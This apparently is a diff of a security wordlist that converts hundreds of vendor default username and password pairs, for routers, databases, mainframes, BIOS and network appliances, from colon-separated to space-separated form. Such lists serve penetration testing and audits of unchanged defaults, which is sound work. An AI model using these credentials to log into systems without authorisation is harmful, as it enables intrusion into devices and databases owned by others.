-admin:tr650 -poll:poll -:j262 -:xljlbj -glftpd:glftpd -:Advance -RMAN:RMAN -mountfs:mountfs -DIRECT: -:console -firstsite:firstsite -:SW_AWARD -IPFSERV: -:snake -Administrator:Gateway -TSUSER:TSUSER -BATCH2: -admin:123123 -:3098z -:cc -snmp:nopasswd -WebAdmin:WebBoard -IBMUSER:SYS1 -SMART: -voadmin:manager -BC4J:BC4J -core:phpreactor -OPERVAX:OPERVAX -Bobo:hello -:Congress -:central -WANGTEK:WANGTEK -disttech:etas -OWA:OWA -USER2:USER2 -jasperadmin:jasperadmin -FIELD:DIGITAL -root:uClinux -guest:guestgue -FAXUSER:FAXUSER -WINSABRE:SABRE -VMBSYSAD: -admin:ip400 -PVM: -ctb_admin:sap123 -:AMI.KEY -:AMI.KEZ - :ANYCOM -USER_TEMPLATE: -DEMO4: -:inuvik49 -QSRV:11111111 -qsrv:qsrv -superdba:admin -PORTAL30:PORTAL31 -PORTAL30:PORTAL30 -XPRT:XPRT -Crowd:password -User:19750407 -18364: -:zjaaadc -ilom-admin:ilom-admin -rdc123:rdc123 -sysopr:sysopr -tasman:tasmannet -SYSTEM:0RACLE8I -:Cisco:router -admin:store -:SER -blank:blank -ADMIN:PASSWORD -admin:IP:address -WEBREAD:WEBREAD -ODM:ODM -11111111:11111111 -prime:prime -AURORA$ORB$UNAUTHENTICATED:INVALID -ADAMS:WOOD -root:vertex25 -sys:bin -lp:lineprin -Craft:crftpw -www:www -postgres:dbpass -rfmngr:$rfmngr$ -sync:sync -WANGTEK: -:1988 -MAINT: -SYSTEST_CLIG:SYSTEST -user:user0000 -user_approver:demo -ilom-operator:ilom-operator -Nice-admin:nicecti -:HELGA-S -answer: -NETNONPRIV:NETNONPRIV -nuucp: -CIDS:CIDS -VASTEST: -primenet:primenet -redline:redline -:rw -spcl:0000 -admin:muze -MBMANAGER:MBMANAGER -webmaster: -APPLSYS:FND -:ro -WINDOWS_PASSTHRU:WINDOWS_PASSTHRU -USER4:USER4 -hqadmin:hqadmin -UOMNI_: -FIELD:TEST -sys:system -Admin:123qwe -VMUTIL: -POST:BASE -:dn_04rjc -uucpadm:uucpadm -halt: -FAXWORKS:FAXWORKS -admin:password1 -EXFSYS:EXFSYS -4Dgifts: -JMUSER:JMUSER -admin:imsa7.0 -SUPERVISOR:NETFRAME -CIS:CIS -UNITY_: -:ciscofw -HLW:HLW -admin:brocade1 -pwrchute:pwrchute -:setup -:Tiny -IDMSSE: -postgres:svcPASS83 -NSA:nsa -!root:!ishtar -admin:blank -root:NeXT -TELEDEMO:TELEDEMO -:AMIDECOD -recover:recover -TRAVEL:TRAVEL -lexar: -:efmukl -viewer: -LIBRARY: -admin:raritan -PO8:PO8 -root@localhost:root -NAMES:NAMES -secofr:secofr -PDMREMI: -:biostar -MGE:VESOFT -USER7:USER7 -OWA_PUBLIC:OWA_PUBLIC -questra:questra -builtin:builtin -SFCNTRL: -SAP*:6071992 -boss:boss -anonymous:password -:isolation -:Q54arwms -PLEX:PLEX -OLAPDBA:OLAPDBA -:g6PJ -OLAPSVR:INSTANCE -user_expert:demo -root:pixmet2003 -Bhosda:Lund -TEST: -qsvr:ibmcel -CMSBATCH:CMSBATCH -:ABCD -gropher: -:AM -administrator:admin -:condo -:Toshiba -:familymacintosh -TAHITI:TAHITI -NEWINGRES:NEWINGRES -:AMI?SW -:mMmM -man:man -VM3812: -root:powerapp -ibm:service -VIF_DEVELOPER:VIF_DEV_PWD -ADMIN:WELCOME -Admin:Barricade -joeuser:joeuser -system:isp -IPC: -HELPDESK:HELPDESK -wlpisystem:wlpisystem -TSAFVM: -prtgadmin:prtgadmin -SYSTEM:CHANGE_ON_INSTALL -:CONCAT -:t0ch88 -webmaster:webmaster -:djonet -ADMIN:changeme -Any: -:Compaq -UAMIS_: -theman:changeit -CISINFO:CISINFO -mobile:dottie -QS_CB:QS_CB -CDEMORID:CDEMORID -tech:nician -DEMO2: -administrator:none -SYS:MANAG3R -End:User:7936 -PORTAL30_PUBLIC:PORTAL30_PUBLIC -sysadmin:nortel -SYS:D_SYSTPW -SYSTEM:SYSPASS -Guest:blank -User:User -MDDEMO_CLERK:CLERK -FIELD:FIELD -Admin:SECRET123 -Guest:Guest -PHANTOM: -admin:amigosw1 -:xmux -write: -ADMINISTRATOR:SENTINEL -system:field -:ducati900ss -qsecofr:22222222 -:lkw:peter -:awkward -:TzqF -SYSTEST_CLIG:SYSTEST_CLIG -ODS:ODS -admin:axis2 -BLAKE:PAPER -TSDEV:TSDEV -PRODBM: -admin:letmein -:joh316 -dos:dos -login:0000 -APL2PP: -system:hdms -admin:phplist -god1:12345 -admin:novell -CICSUSER:CISSUS -22222222:22222222 -root:passw0rd -user_publisher:demo -OSE$HTTP$ADMIN:(random:password) -def:trade -SuperUser:kronites -QS_CBADM:QS_CBADM -SYSA:SYSA -:00000000 -STUDENT:STUDENT -Draytek:1234 -SMDR:SECONDARY -EREP: -VSEMAN: -:OOOOOOOO -primos_cs:prime -demo: -fwadmin:xceladmin -:j64 -MTS_USER:MTS_PASSWORD -:AWARD_SW -AQDEMO:AQDEMO -private:ReadWrite:access:secret -:GWrv -:MagiMFP -:SnuFG5 -IS_$hostname:IS_$hostname -HPSupport:badg3r5 -ORASSO:ORASSO -GATEWAY: -:t0ch20x -CVIEW: -SH:SH -:zeosx -XXSESS_MGRYY:X#1833 -:wodj -:FOOBAR -SYSMAN:SYSMAN -VMMAP: -admin:urchin -PORTAL30_DEMO:PORTAL30_DEMO -Ezsetup: -QS_CS:QS_CS -administrator:PlsChgMe! -CMSUSER: -:MCUrv -DEMO1: -admin:adminadmin -userNotUsed:userNotU -:AMI~ -root:ibm -ncadmin:ncadmin -TESTPILOT:TESTPILOT -:Polrty -fg_sysadmin:password -UETP:UETP -QS:QS -DBI:MUMBLEFRATZ - :ILMI -SYSTEM:SYS -JWARD:AIROPLANE -APPS_MRC:APPS_MRC -:uboot -Moe:hello -SENTINEL:SENTINEL -admin:netgear1 -Yak:asd123 -PDP11:PDP11 -:aammii -Flo:hello -SLIDE:SLIDEPW -root:bagabu -primeos:primeos -:Spacve -:256256 -INFO:INFO -checkfsys:checkfsys -PRODCICS:PRODCICS -:foolproof -:AWARD_PW -MXAGENT:MXAGENT -SYSTEM:ORACLE8I -admin:no:password -VMTLIBR: -POWERCARTUSER:POWERCARTUSER -VMBACKUP: -CPNUC: -:QDI -:shiva -distrib:distrib0 -SUPERVISOR:SUPERVISOR -SYSMAINT:SERVICE -MIGRATE:MIGRATE -CDEMOUCB:CDEMOUCB -system:prime -QSRV:22222222 -:c -OLTSEP: -sysbin:sysbin -signa:signa -autocad:autocad -:SWITCHES_SW -WEBDB:WEBDB -daemon: -:aPAf -ncrm:ncrm -SAMPLE:SAMPLE -:1 -HCPARK:HCPARK -ALLINONE:ALLINONE -nm2user:nm2user -SAVSYS: -IIPS: -PATROL:PATROL -:technolgi -:MBIU0 -mailadmin:secret -adm:adm -TMSADM: -tutor:tutor -ESubscriber: -CHEY_ARCHSVR:CHEY_ARCHSVR -write:synnet -software:software -admin:welcome -god2:12345 -bbs:bbs -:Dell -disttech:disttech -FSFTASK2: -:zbaaaca -:prost -ORDSYS:ORDSYS -Administrator:administrator -:1234567890 -gopher:gopher -PSFMAINT: -SYSTEM:MANAG3R -:RM -:s!a@m#n$p%c -EAdmin: -12345:12345 -DECNET:DECNET -OPERATIONS:OPERATIONS -$system: -REP_OWNER:DEMO -PANAMA:PANAMA -LIBRARIAN:SHELVES -SYSTEM:0RACLE -fal: -4Dgifts:4Dgifts -:biosstar -NETSERVER:NETSERVER -:tiny -root:TANDBERG -POWERCHUTE:APC -USER5:USER5 -GPFD:GPFD -:12345678 -blank:admin -QS_OS:QS_OS -sysadm:admin -REPADMIN:REPADMIN -Administrator:12345678 -0:0 -DEMO8:DEMO8 -DEMO9:DEMO9 -CDEMO82:CDEMO82 -admin:boca:raton -Administrator:vision2 -administrator:0 -umountsys:umountsys -snmp:snmp -Username:PASSWORD -volition: -USER0:USER0 -CDEMOCOR:CDEMOCOR -SYSTEST:UETP -Rodopi:Rodopi -DECNET:NONPRIV -user_checker:demo -:tatercounter2000 -qserv:qserv -:ESSEX:or:IPC -AQ:AQ -support: -SAPR3:SAP -VRR1:VRR1 -fastwire:fw -admi:admin -FINANCE:FINANCE -WinCCAdmin:2WSXcder -ESTOREUSER:ESTORE -fax:fax -VIRUSER:VIRUSER -LINK:LINK -APPLSYSPUB:FNDPUB -:BIOS -SYS:ORACLE8 -SYS:ORACLE9 -overseer:overseer -checksys:checksys -umountfs:umountfs -DBDCCICS:DBDCCIC -Admin:password -:x6zynd56 -TOAD:TOAD -root:mozart -ntpupdate:ntpupdate -root:router -MDDEMO_MGR:MGR -ARCHIVIST: -SUPERVISOR:HARRIS -:11111 -billy-bob: -lp:bin -DECMAIL:DECMAIL -alien:alien -admin:dnnadmin -nsroot:nsroot -AdvWebadmin:advcomm500349 -dvstation:dvst10n -SERVICECONSUMER1:SERVICECONSUMER1 -MMO2:MMO2 -qsecofr:11111111 -NOC:NOC -WWWUSER:WWWUSER -root::Serial:port:only: -SAP:SAPR3 -root:t0talc0ntr0l4! -NEVIEW: -MAIL: -ODSCOMMON:ODSCOMMON -fal:fal -pixadmin:pixadmin -ripeop: -PENG: -:BIOSPASS -netlink:netlink -L2LDEMO:L2LDEMO -OUTLN:OUTLN -12.x: -scott:tiger:or:tigger -:toshy99 -dbase:dbase -:nz0u4bbe -fam:fam -:bell9 -Oper:Oper -RMAIL:RMAIL -administrator:19750407 -FND:FND -admin:exinda -PRIV:PRIV -admin:barney -SETUP: -:biodata -:24Banc81 -news:news -VSEIPO: -:j09F -pw:pw -GUEST: -ilon:ilon -:award_? -SYS:0RACLE39 -SYS:0RACLE38 -DEFAULT:DEFAULT -:AMI!SW -PLSQL:SUPERSECRET -root:alpine -politcally:correct -18140815:18140815 -APPUSER:APPUSER -SUPERVISOR: -CENTRA:CENTRA -LBACSYS:LBACSYS -:alfarome -PDP8:PDP8 -SFCMI: -administrator:*:*:# -lpadm:lpadm -Test:Everything: -bewan:bewan -:2580 -DIP:DIP -:Sxyz -mfd:mfd -MDDEMO:MDDEMO -:intermec -:589589 -SWPRO:SWPRO -DES:DES -root:fibranne -Coco:hello -GCS: -rodopi:rodopi -:touchpwd= -Scott:Tiger -Admin5:4tugboat -admin:funkwerk -ANDY:SWORDFISH -DESQUETOP: -nobody: -Manager:657 -:mysweex -SYSTEM:SYSLIB -NETCON:NETCON -JONES:STEEL -author:author -MOESERV: -web:web -tech:User -PUBSUB1:PUBSUB1 -SYS:D_SYSPW -CATALOG:CATALOG -:IBM -:Guest -SQLUSER: -RE:RE -REPORTS_USER:OEM_TEMP -MFG:MFG -POST:POST -HPLASER:HPLASER -HR:HR -VIDEOUSER:VIDEO:USER -DBA:SQL -:CMOSPWD -guest1:guest -superuser:asante -SYSTEM:0RACLE38 -SYSTEM:0RACLE39 -AUTOLOG1: -dadmin:dadmin -AURORA$JIS$UTILITY$: -wlcsystem:wlcsystem -news: -CPRM: +admin admin + +admin + admin +admin password +admin 1234 +root +Administrator admin +admin epicrouter +sysadm sysadm + 1234 + password + access +root root +tech tech + smcadmin + 0 +Administrator +root pass + system +root admin + PASSWORD + Symbol +operator +guest guest +admin bintec +security security +guest +debug synnet +manager manager + adtran +admin motorola +service smile + cascade +admin 0 +!root +user password + BRIDGE +netman netman +super super +admin switch +admin setup +admin changeme +diag switch +operator operator +user user +user +Cisco Cisco +Manager Manager +DTA TJM +apc apc +tech + cisco +User +root 1234 +Admin + letmein +cablecom router +adm +wradmin trancell + ascend +manager friend + NetICs +root blender +netscreen netscreen + sysadm + SKY_FOX +sa + public + Master +setup setup +root default + laflaf +cmaker cmaker +enable +MICRO RSX +login admin + Posterie +write private +root attack +monitor monitor + private + xdfk9874t3 +netopia netopia + Col2ogro2 +admin microbusiness +op op +adminview OCS +op operator +admin secure +admin atlantis +sysadmin sysadmin +super 5777364 +echo echo +craft +adm cascade +admin default +maint maint +comcast 1234 +CSG SESAME +diag danger +readonly lucenttech2 +admin operator +Manager +debug d.e.b.u.g +admin hello + SYSTEM +root ascend +root calvin +manuf xxyyzz +cusadmin highspeed +admin 123 +smc smcadmin +admin Sharp +root password +sweex mysweex +disttech 4tas +su super +admin system +root changeme +poll tech +sysadmin password +SYSDBA masterkey +anonymous + 0000 +root permit +admin barricade +support support +root tslinux +admin hp.com +recovery recovery +USERID PASSW0RD +eng engineer +administrator administrator +admin pwp +admin isee +NETWORK NETWORK +JDE JDE +admin superuser +Guest + Super +admin admin123 +super surt +rwa rwa +admin 123456 +admin NetCache + ADTRAN +USER USER +test test +admin extendnet +admin ironport +lp lp + Cisco +administrator +admin 1111 +sysadmin PASS +ro ro +admin Ascend + _Cisco +MAIL MAIL +ami + sitecom +hsa hsadb +system password +MGR CAROLIAN +ADMINISTRATOR ADMINISTRATOR +admin sysAdmin +root tini +admin smcadmin + Helpdesk +FIELD SERVICE +PBX PBX +netman +HELLO FIELD.SUPPORT +system sys +hscroot abc123 +1502 1502 + star +superuser admin +HELLO MGR.SYS +sysadm anicust +Administrator Administrator +netrangr attack + Intel + 12345 +readwrite lucenttech1 + secret +piranha piranha +wlse wlsedb +admin cisco +l3 l3 +admin diamond +none admin +naadmin naadmin +public public +admin 1988 +admin radius +admin root +NETOP +Administrator letmein +HELLO MANAGER.SYS + raidzone + 3ascotel +MANAGER HPOFFICE +demo demo + 166816 +User Password +admin zoomadsl +D-Link D-Link +user public +user pass +l2 l2 +MGR CCC +rw rw +cgadmin cgadmin +storwatch specialist + secure +vcr NetVCR +OPERATOR COGNOS +piranha q +admin synnet +MDaemon MServer +root cms500 +root davox +jagadmin +enquiry enquirypw +at4400 at4400 +support h179350 +davox davox +admin asd +PFCUser 240653C9467E45 +setup changeme +superuser superuser + atc123 +aaa +root admin_1 + 266344 +MGR WORD +topicalt password +admin2 changeme +1234 1234 +MANAGER ITF3000 + connect +FIELD HPONLY +nms nmspw +client client +admin comcomcom + speedxess +MGR ROBELLE + epicrouter +sys uplink +OPERATOR SYSTEM +field support +MGR SYS +root letacla + FORCE +deskman changeme +MAIL REMOTE +SYSADM sysadm +superadmin secret + backdoor +pmd +MGR CNAS +admin 22222 +GEN2 gen2 + medion +ADMN admn +Factory 56789 +PRODDTA PRODDTA +tellabs tellabs#1 +spcl 0 +dadmin dadmin01 + comcomcom +administrator password +helpdesk OCS +dhs3mt dhs3mt +MGR SECURITY +setup changeme! +install llatsni +adfexc adfexc +IntraSwitch Asante +manage !manage +superman 21241036 +MANAGER TELESUP +craft crftpw +login 0 + help +MGR HPOFFICE + lantronix +SPOOLMAN HPOFFICE +manager admin + netadmin +ADVMAIL HP +FIELD SUPPORT +MANAGER SYS +MGR VESOFT +vt100 public +PSEAdmin $secure$ +HELLO OP.OPERATOR +Manager friend + hs7mwxkk +patrol patrol + SUPER + SMDR + 1064 +teacher password +PCUSER SYS +MGR ITF3000 +Any 12345 +OPERATOR DISC +RSBCMON SYS +cellit cellit +MGR INTX3 +inads inads +halt tlah +root wyse +locate locatepw +admin visual +TMAR#HWMT8007079 +rapport r@p8p0r+ +MGR TELESUP +xbox xbox + TENmanUFactOryPOWER +device device +NICONEX NICONEX +admin admin1234 +root fivranne +acc acc +31994 31994 +admin netadmin +bcim bcimpw +websecadm changeme +blue bluepw +topicnorm password +supervisor PlsChgMe + R1QTPS +MGR HPONLY +ccrusr ccrusr +root Cisco +login password +266344 266344 +MAIL MPE +telecom telecom +MAIL HPOFFICE +GEN1 gen1 +Administrator smcadmin +SSA SSA + snmp-Trap +HTTP HTTP + default +mtch mtch +admin adslolitec +Administrator ganteng +bciim bciimpw +browse browsepw +Admin Admin + Password +hydrasna +sys change_on_install +deskres password +bbsd-client changeme2 +anonymous Exabyte +admin rmnetlm +replicator replicator +intel intel +OPERATOR SUPPORT +MGR HPP196 +radware radware +intermec intermec +mlusr mlusr +MGR RJE +FIELD LOTUS +init initpw +e250 e250changeme +MAIL TELESUP +Polycom SpIp +temp1 password + adminttd +tech field +support supportpw +mac + MiniAP +MANAGER SECURITY +3comcso RIP000 +RMUser1 password +WP HPOFFICE +Administrator changeme +MGR XLSERVER +MGR HPP187 +MGR HPP189 +inads indspw +admin linga +craft craft + enter +NAU NAU +rcust rcustpw +admin AitbISP4eCiG +mtcl mtcl +MGR CONV +topicres password +bcnas bcnaspw +MGR NETBASE +admin access +public +adminuser OCS +MGR REGO +Root +cac_admin cacadmin +mediator mediator +superman talent +Anonymous +kermit kermit +admin x-admin +MGR HPDESK + 9999 +root ROOT500 +admin my_DEMARC +volition volition +GlobalAdmin GlobalAdmin + 4getme2 +LUCENT01 UI-PSWD-01 +admin 2222 +LUCENT02 UI-PSWD-02 +MANAGER TCH +adminstat OCS +desknorm password +IntraStack Asante +OPERATOR SYS +MGR COGNOS + Fireport + ILMI +maint maintpw +supervisor supervisor +e500 e500changeme +admin mu +MANAGER COGNOS +deskalt password +admin OCS +bbsd-client NULL +cust custpw +admin noway +tiara tiaranet +bcms bcmspw + TANDBERG +m1122 m1122 +telco telco +superuser +xd xd +dhs3pms dhs3pms +VNC winterm +craft craftpw +maint rwmaint +anonymous any@ +login access +browse looker +customer none +cisco cisco +adminstrator changeme +FIELD MANAGER + 1234admin +FIELD MGR +ftp_nmc tuxalize +me +iclock timely +echo User +ADVMAIL HPOFFICE DATA +login 1111 +login 8429 +Administrator manage + Babylon +admin hagpolm1 +root 12345 +scmadmin scmchangeme +user tivonpw +sysadm Admin +Administrator password +admin administrator +installer installer +webadmin webadmin +ftp_inst pbxk1064 +DDIC 19920706 + pento +admin NetSurvibox +SYSTEM D_SYSTPW +draytek 1234 + 3477 +operator $chwarzepumpe +administrator asecret +EARLYWATCH SUPPORT + 10023 +Manager Admin +super.super +ftp_oper help1954 +corecess corecess +superuser 123456 +admin Password +super.super master +admin Protector +SYSTEM MANAGER +webadmin 1234 +install secret +FIELD HPWORD PUB +admin 12345 +admin symbol +weblogic weblogic +Admin 1988 +system/manager sys/change_on_install +root 3ep5w2u + 8111 + jannie +End User 123 +none 0 +d.e.b.u.g User +admin tomcat +target password +Administrator pilou +MD110 help +Administrator 3ware + ANYCOM +tiger tiger123 +adminttd adminttd +admin asante +admin smallbusiness +admin netscreen +FIELD HPP187 SYS +guest User +maint ntacdmax +admin w2402 +wlseuser wlsepassword +SAPCPIC admin +ftp_admi kilo1987 +admin articon +mtcl +default.password +admin michelangelo +manager changeme +root Mau'dib + Serial Num +root ggdaseuaimhrke +7 maintain +2 syslib +ADMIN admin +system weblogic +Administrator ggdaseuaimhrke +ADMIN +itsadmin init +PUBSUB PUBSUB +admin demo +system manager +sys sys +CTXSYS CTXSYS +ftp +bill bill +192.168.1.1 60020 @dsl_xilno +FIELD +admin dmr99 +setpriv system +GUEST GUEST +SAP* 06071992 +operator 1234 +t3admin Trintech +hello hello +supervisor +CISCO15 otbu+1 +1.79 Multi + babbit +mso w0rkplac3rul3s +Telecom Telecom +qsysopr qsysopr +admin TANDBERG +admin imss7.0 + nokia +APPS APPS +Developer isdev +mail mail +admin draadloos +qsecofr qsecofr +11111 x-admin + default.password +Service 5678 +enable cisco +netadmin nimdaten +Polycom 456 +admin P@55w0rd! +admin 1234admin +root par0t +any system +db2fenc1 db2fenc1 +johnson control +2 maintain +isp isp +demos +QSRV QSRV +root iDirect +MDSYS MDSYS +Admin 123456 +2 manager +vpasp vpasp +TEST TEST + Telecom +QSECOFR QSECOFR +adm none + 2501 +1 syslib +system security +admin leviton +!root blank +informix informix +root mpegvideo +5 games +root 0P3N +engmode hawk201 +scout scout +qpgmr qpgmr +admin admin000 +ADSL expert03 +cisco +images images +admin security +admin surecom +Gearguy Geardog + symantec +comcast +admin adslroot +1 manager +Demo + xyzzy +Administrator adaptec +system system +SAP* PASS +serial# serial# +BACKUP BACKUP +stratacom stratauser +root rootme +6.x +root !root +webadmin webibm + riverhead +mary password +COMPANY COMPANY +SYS SYS +DSL DSL +Jetform +none amber +eagle eagle +ROUTER +root brightmail +admin pass + HEWITT RAND +ods ods +siteadmin toplayer +admin OkiLAN +root rootpass +Alphanetworks wrgg15_di524 + x40rocks + nokai +Admin1 Admin1 +field field +Admin admin +Admin ImageFolio + iolan + manager +admin pfsense +janta sales janta211 +servlet manager +username password +citel password +Replicator iscopy +SYSMAN OEM_TEMP +1 operator +SYSTEM SYSTEM +administrator RSAAppliance +master themaster01 +Admin 1234 +2 operator +SUPERUSER ANS#150 +admin passwort +cn=orcladmin welcome +30 games +maintainer admin +setup + hello +admin NetSeq +BRIO_ADMIN BRIO_ADMIN + citel +internal oracle +CQSCHEMAUSER PASSWORD +root kn1TG7psLu +SYS SYSPASS + lkwpeter +DEV2000_DEMOS DEV2000_DEMOS +FSFTASK1 +checkfs checkfs +BACKUP +USER1 USER1 +root TENmanUFactOryPOWER +SQLDBA +root resumix +HELP HELP +toor logapp +SYS 0RACLE9 +SYS 0RACLE8 + 57gbzb +!root none +qsrvbas qsrvbas +SYSADMIN +EZsetup +Administrator 1234 + sldkj754 +BATCH +STRAT_USER STRAT_PASSWD +Administrator 19750407 + User +user USERP +primenet primeos +OEMREP OEMREP +admin [^_^] +USER6 USER6 +lynx + TTPTHA +powerdown powerdown +root Mau’dib +SYSTEM ORACL3 +$ALOC$ +password +VOL-0215 +admin nimda +tomcat tomcat +REP_MANAGER DEMO +WinCCConnect 2WSXcder +ALLIN1 ALLIN1 +DIRMAINT +eqadmin Serial port only equalizer +sysadm sysadmpw +QSRVBAS QSRVBAS +admin ip305Beheer +debug tech + ACCORD +AQJAVA AQJAVA +LASERWRITER LASERWRITER +Administrator 0000 +root nsi +PERFSTAT PERFSTAT +apcuser apc +MBWATCH MBWATCH + protection +system_admin +unix unix +OWNER OWNER +NETPRIV NETPRIV +VSEMAINT + AWARD?SW +DEMO DEMO +tomcat changethis +SYMPA SYMPA +REP_OWNER REP_OWNER +DCL DCL +FAX +root dbps +ARCHIVIST ARCHIVIST +USER PASSWORD +VTAMUSER +LASERWRITER +VMTAPE +basisk basisk +NetLinx password +OutOfBox demos guest 4DGifts (none by default) +none letmein +NETMGR NETMGR +DEFAULT USER +OAS_PUBLIC OAS_PUBLIC +read +AP AP +demos demos +SYSTEM Admin +admin j5Brn9 +MTSSYS MTSSYS +SYSMAINT DIGITAL +AUDIOUSER AUDIOUSER +Joe hello +IDMS + teX1 +admin allot +$SRV $SRV +snake +SYS 0RACLE +ADVMAIL +Administrator nicecti +ROOT ROOT +PRINTER PRINTER +shutdown +satan + m1link +RDM470 +master access + l2 + l1 +trouble trouble +fax +OP1 +admin@example.com admin +root trendimsa1.0 +HOST HOST +ADLDEMO ADLDEMO +QS_ADM QS_ADM +bin sys + AMI +OPER OPER +oracle +jj +PO7 PO7 +SYSTEM 0RACLE8 +SYSTEM 0RACLE9 +www +joe password + komprie + 123 +MAINT MAINT +CMSBATCH +root toor +CCC +role1 tomcat +DATAMOVE +lp + AMISETUP + sp99dd +halt halt +MSHOME MSHOME +ISPVM +crowd­-openid-­server password +user_editor demo +sedacm secacm +ROOT +Admin 3Com +db2admin db2admin +Airaya Airaya +supervisor visor +none Wireless +SYSDUMP1 +IMEDIA IMEDIA + Biostar +install install +primos_cs primos +admin infrant1 +Administrator Partner + Administrative +USER_TEMPLATE USER_TEMPLATE +pnadmin pnadmin + h6BB +lpadmin lpadmin +guest none +VTAM VTAM +TRACESVR TRACE +POSTMASTER POSTMASTER +MAILER MAILER +RSCSV2 +QS_WS QS_WS + sma +system_admin system_admin +circ +Demo password + rwa +nobody nobody +Tasman Tasmannet +admin !admin +DISCOVERER_ADMIN DISCOVERER_ADMIN +VMASMON +LR-ISDN LR-ISDN +TURBINE TURBINE +GL GL +PO PO + AMI_SW +super superpass +PRINT +MODTEST YES +GATEWAY GATEWAY +root system +PRIMARY PRIMARY +both tomcat + award.sw +haasadm lucy99 +pw pwpw +games games +DOCSIS_APP 3Com +bbs +EMP EMP +Admin cclfb +postmaster +SITEMINDER SITEMINDER +Any Any +vgnadmin vgnadmin +RJE RJE +gonzo +NEWS NEWS +sa Ektron + Award +AQUSER AQUSER +UTLBSTATU UTLESTAT + AMIAMI +netbotz netbotz +CTXSYS CHANGE_ON_INSTALL +xmi_demo sap123 + Crystal + Daewuu +ftp ftp +ORACACHE (random password) +MCUser MCUser1 +prash hello +sync +sysadm admpw +root rootadmin +PM PM +AP2SVP +master master +ibm 2222 +ULTIMATE ULTIMATE +SABRE +role1 role1 +user_pricer demo +admin enhydra +SUPERVISOR NF +EVENT EVENT + xyzall + rainbow +ADMIN JETSPEED +SYS ORACL3 +PORTAL30_SSO_PS PORTAL30_SSO_PS +FSFADMIN +OO OO +WKSYS WKSYS +OPERATNS OPERATNS + ksdjfg934t +UVPIM_ + merlin +OE OE +Any Local User Local User password +OCITEST OCITEST +web + HLT +ADMINISTRATOR admin +ESSEX + last +CTXSYS +None xyzzy +CTXDEMO CTXDEMO +user_designer demo + Admin + zebra +QDBA QDBA +role changethis +LRISDN LRISDN +tele tele +WEBCAL01 WEBCAL01 +rsadmin rsadmin +OMWB_EMULATION ORACLE +root alien +WINDOWS_PASSTHRU + sanfran +public ReadOnly access secret + AMIPSWD +MOREAU MOREAU +fast abd234 +root QNX +host dnnhost +administrator root +admin public +SYSTEM ORACLE + sertafu +ORDPLUGINS ORDPLUGINS +SYSWRM +mail + telos +ADMIN ADMIN +administrator adminpass +savelogs crash + ACCESS +SDOS_ICSAP SDOS_ICSAP +system adminpwd +BATCH BATCH +GUEST GUESTGUEST +SYSMAINT SYSMAINT +postmaster postmast +DSSYS DSSYS + award_ps + ZAAADA +MGWUSER MGWUSER + NTCIP +OPERATOR + hewlpack +TDOS_ICSAP TDOS_ICSAP +ssp ssp +EJSADMIN EJSADMIN + damin +INGRES INGRES +DS + A.M.I +estheralastruey + 1322222 +VCSRV VCSRV +Administrator storageserver +ssladmin ssladmin +CLARK CLOTH +shutdown shutdown +administrator 1234 +OEMADM OEMADM +restoreonly restoreonly1 +quser quser +PRINTER +MILLER MILLER +trmcnfg trmcnfg +REPORT REPORT +user_author demo + aLLy +dpn changeme +tour tour +mountfsys mountfsys +http +PROG PROG + iwill +openfiler password + Public +admin mp3mystic +RAID hpt +read synnet +admin peribit +STARTER STARTER +FAXUSER +GUEST GUESTGUE +DSA + guardone +daemon daemon +mountsys mountsys +SYSTEM ORACLE9 +SYSTEM ORACLE8 + gandalf +backuponly backuponly1 +IVPM1 + leaves +sysadm syspw +root blablabla + Compleri +USER3 USER3 +OPENSPIRIT OPENSPIRIT + spooml + changeit + wg +prime primeos +HPLASER + Vextrex +CSPUSER +qsvr qsvr +lynx lynx +SYSCKP +root letmein +Sysop Sysop +user_marketer demo +IMAGEUSER IMAGEUSER +root Password +bsxuser bsxpass +MASTER PASSWORD +USER9 USER9 +root ax400 +OLAPSYS MANAGER +SYSTEM OPERATOR +oracle oracle +root Mau?dib + MASTER +root t00lk1t +rsadmin + Daytec +OutOfBox + SZYX + cmaker + CTX_123 +rje rje +ODM_MTR MTRPW +QS_ES QS_ES +lansweeperuser mysecretpassword0* +DEMO3 +Username password +GPLD GPLD +uucp uucp +DBSNMP DBSNMP +VMARCH +GUEST TSEUG +SWUSER SWUSER +root 8RttoTriz +VTAM +OPERATNS +Operator Operator +CHEY_ARCHSVR +SYS ORACLE +roo honey +n.a guardone +accounting accounting +backuprestore backuprestore1 +PRINT PRINT + j322 + Craftr4 +dni dni +WEBADM password +iceman +guru *3noguru +FAX FAX +anon anon + j256 +USER8 USER8 +root honey +PORTAL30_SSO_PUBLIC PORTAL30_SSO_PUBLIC + 589721 +postgres +WINSABRE WINSABRE +USERP USERP +none public +Admin shs +SYS MANAGER +IVPM2 +PORTAL30_SSO PORTAL30_SSO +ALLIN1MAIL ALLIN1MAIL +POST +TEMP + xo11nE +admin nms +SYSADM SYSADM +BATCH1 +me me +SUPERVISOR NFI +PROMAIL +SECDEMO SECDEMO +ARAdmin AR#Admin# +sadmin +ORAREGSYS ORAREGSYS +VMASSYS +man +FROSTY SNOWMAN +LASER LASER +tutor + ?award +root changethis +DISKCNT +default WLAN_AP +SYSERR +WWW WWW +VAX VAX +none none + Cable-docsis +PROCAL +SUPERVISOR SYSTEM +FAXWORKS +ibm password +CTXSYS UNKNOWN +LDAP_Anonymous LdapPassword_1 +(any 3 chars) cascade +games +User 1234 + Zenith +setup/snmp setup/nopasswd +DSGATEWAY DSGATEWAY +AWARD_SW +CSMIG CSMIG + year2000 +umountfsys umountfsys + BIGO +root jstwo +VMS VMS +dni +bpel bpel +viewuser viewuser1 +admin ISPMODE +TDISK +politically correct +user_analyst demo +admin conexant +guest 1234 +root logapp +admin ip3000 +RSCS +COMPIERE COMPIERE +OSP22 OSP22 +guest1 guest1 +FORSE FORSE + lesarotl +factory factory +bubba (unknown) +admin ip20 +admin ip21 +LASER +QUSER QUSER + AWARD SW +primeos prime +admin tr650 +poll poll + j262 + xljlbj +glftpd glftpd + Advance +RMAN RMAN +mountfs mountfs +DIRECT + console +firstsite firstsite + SW_AWARD +IPFSERV + snake +Administrator Gateway +TSUSER TSUSER +BATCH2 +admin 123123 + 3098z + cc +snmp nopasswd +WebAdmin WebBoard +IBMUSER SYS1 +SMART +voadmin manager +BC4J BC4J +core phpreactor +OPERVAX OPERVAX +Bobo hello + Congress + central +WANGTEK WANGTEK +disttech etas +OWA OWA +USER2 USER2 +jasperadmin jasperadmin +FIELD DIGITAL +root uClinux +guest guestgue +FAXUSER FAXUSER +WINSABRE SABRE +VMBSYSAD +admin ip400 +PVM +ctb_admin sap123 + AMI.KEY + AMI.KEZ +  ANYCOM +USER_TEMPLATE +DEMO4 + inuvik49 